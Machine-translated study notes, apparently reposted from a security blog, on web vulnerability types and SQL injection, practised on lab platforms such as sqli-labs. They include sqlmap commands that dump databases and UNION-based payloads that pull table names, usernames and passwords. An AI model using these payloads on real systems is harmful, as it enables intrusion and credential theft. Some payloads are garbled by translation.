Note source ：11.WEB Loophole ——SQL Knowledge points must be understood when injecting · Language sparrow

（ The blogger's notes are too detailed , It's more useful to look at his than mine , Borrowing is convenient for future review ）

One 、web Knowledge points of vulnerability must be understood

1、 common web The harm of loopholes ️

（1）、sql Inject

（2）、xss

（3）、xxe

（4）、 Upload files

（5）、 File contains

（6）、 File read

（7）、csrf（ User request forgery ）

（8）、ssrf（ Server side Request Forgery ）

（9）、 Deserialization

（10）、 Code execution

（11）、 Logical loopholes

（12）、 Unauthorized access

        Leakage of sensitive information

（13）、 Command execution

（14）、 Directory traversal

2、 Hierarchy

（1） High risk vulnerability ：

        SQL Inject 、 Upload files 、 File contains 、 Code execution 、 Unauthorized access 、 Command execution .

        influence ： Directly affect the website permissions and database permissions , Be able to obtain data or sensitive files of the website . Data security and permission loss are high-risk vulnerabilities .

（2） Medium risk loopholes

         Deserialization 、 Logical security .

（3） Low risk vulnerability

        XSS cross-site 、 Directory traversal 、 File read

        influence ： Website source code , Some accounts and passwords of the website

3、 application

       （ pikachu Vulnerability training platform ,gihub Download the source code ,phpstudy build ）

        CTF：SQL Inject 、 Upload files 、 Deserialization 、 Code execution ;

        SRC： Holes can appear in the picture , There are many logical security problems ;

         Red and blue against ： High risk vulnerabilities involved , Upload files 、 File contains 、 Code execution 、 Command execution .

Two 、sql Inject

1、 Briefly sql Inject

（1）sql Injection generation principle ：

        1） The parameters entered by the user are not strictly filtered （ Such as filtering single and double quotation marks Angle brackets, etc ）, It is taken to the database to execute , It's caused SQL Inject ;

        2） It uses string splicing to construct SQL sentence .

（2）sql Injection classification ：

        1） According to the injection method, it can be divided into ： Joint query injection 、 Error reporting injection 、 Boolean Injection 、 Delay Injection 、 Stack Injection

        2） According to the data type, it can be divided into ： Character （ That is, the input is filtered with symbols ）、 Numerical type （ That is, the input is not filtered with symbols ）

        3） From the injection position, it can be classified as ：GET data （ The data submission method is GET, Most of them exist in the address bar ）、POST data （ The data submission method is POST, Most of them exist in the input box ）、HTTP Head （ The data submission method is HTTP Head ）、cookie data （ The data submission method is cookie）

（3）sql Injection hazard ：

（4） Pre knowledge

        1） stay MYSQL5.0 In the above version ,MYSQL There is a built-in database named information_schema, It is a storage record with all database names , Table name , Database of column names , It is also equivalent to querying it to obtain the table name or column name information under the specified database .

        2） Symbols in the database "." Represents the next level , Such as xiaodi.user Express xiaodi Database based user Table name .

        3） Parameters ：

                information_schema.tables： A table that records all table name information

                information_schema.columns： A table that records all column name information

                table_name： Table name

                column_name： Name

                table_schema： Database name

                user()   View the current MySQL Login user name

                database() View current usage MySQL Database name

                version() View the current MySQL edition

（5） Injection point judgment

（6）sql Injection steps ：

        1） Injection of statements

        2）sqlmap utilize         

                a） Get database name

        get type ：python sqlmap.py -u "url" --cookie="" --dbs --batch 

        post type ：  python sqlmap.py -u "url" --cookie="" --data="payload value " --dbs --batch       

               b） Get table name

        get type ：python sqlmap.py -u "url" --cookie="" -D Database name --tables --batch

        post type ：python sqlmap.py -u "url" --cookie="" --data="payload value " -D Database name --tables --batch

               c） Get the information in the table

        get type ：python sqlmap.py -u "url" --cookie="" -D Database name --tables -T Table name --dump --batch

        post type ：python sqlmap.py -u "url" --cookie="" --data="payload value " -D Database name --tables -T Table name --dump --batch

（7） demonstration

        （ recommend sqlilabs Platform practice , Special sql Inject into the practice platform ）

        Law 1 、sql Injection of statements

        1） test ：

                // There was an error entering special characters in the web page , It shows that there is an injection point with database query , There is sql Inject holes , After trying , It is found that single quotation marks can close statements , Web page pair # Conduct url escape , Use %23 Instead of , Comment out the following statements

        2）order by Number of query Columns ：

                3 Column without error ,4 Wrong presentation , So there is 3 Column

        3） The joint query , Query database name （ Using federated queries , You need to change the content of the previous query to impossible ）：

union select 1,2,3

                The first column does not show , So in 2 or 3 Column query database name ：

union select 1,database(),3

        4） Joint query database table name

union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3%

        5） Query sensitive column information in the table ：

union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users')

         6） Further query sensitive information in the column , Such as username、password

union select(group_concat(username,password) from users)

2、mysql Inject

3、 Type and submit injection

4、oracle、mangodb Injection, etc.

5、 Query method and error reporting blind note

6、 secondary 、 encryption 、dns Isoinjection

7、 Stacking and waf Bypass injection

8、sqlmap Bypass waf

3、 ... and 、 Upload files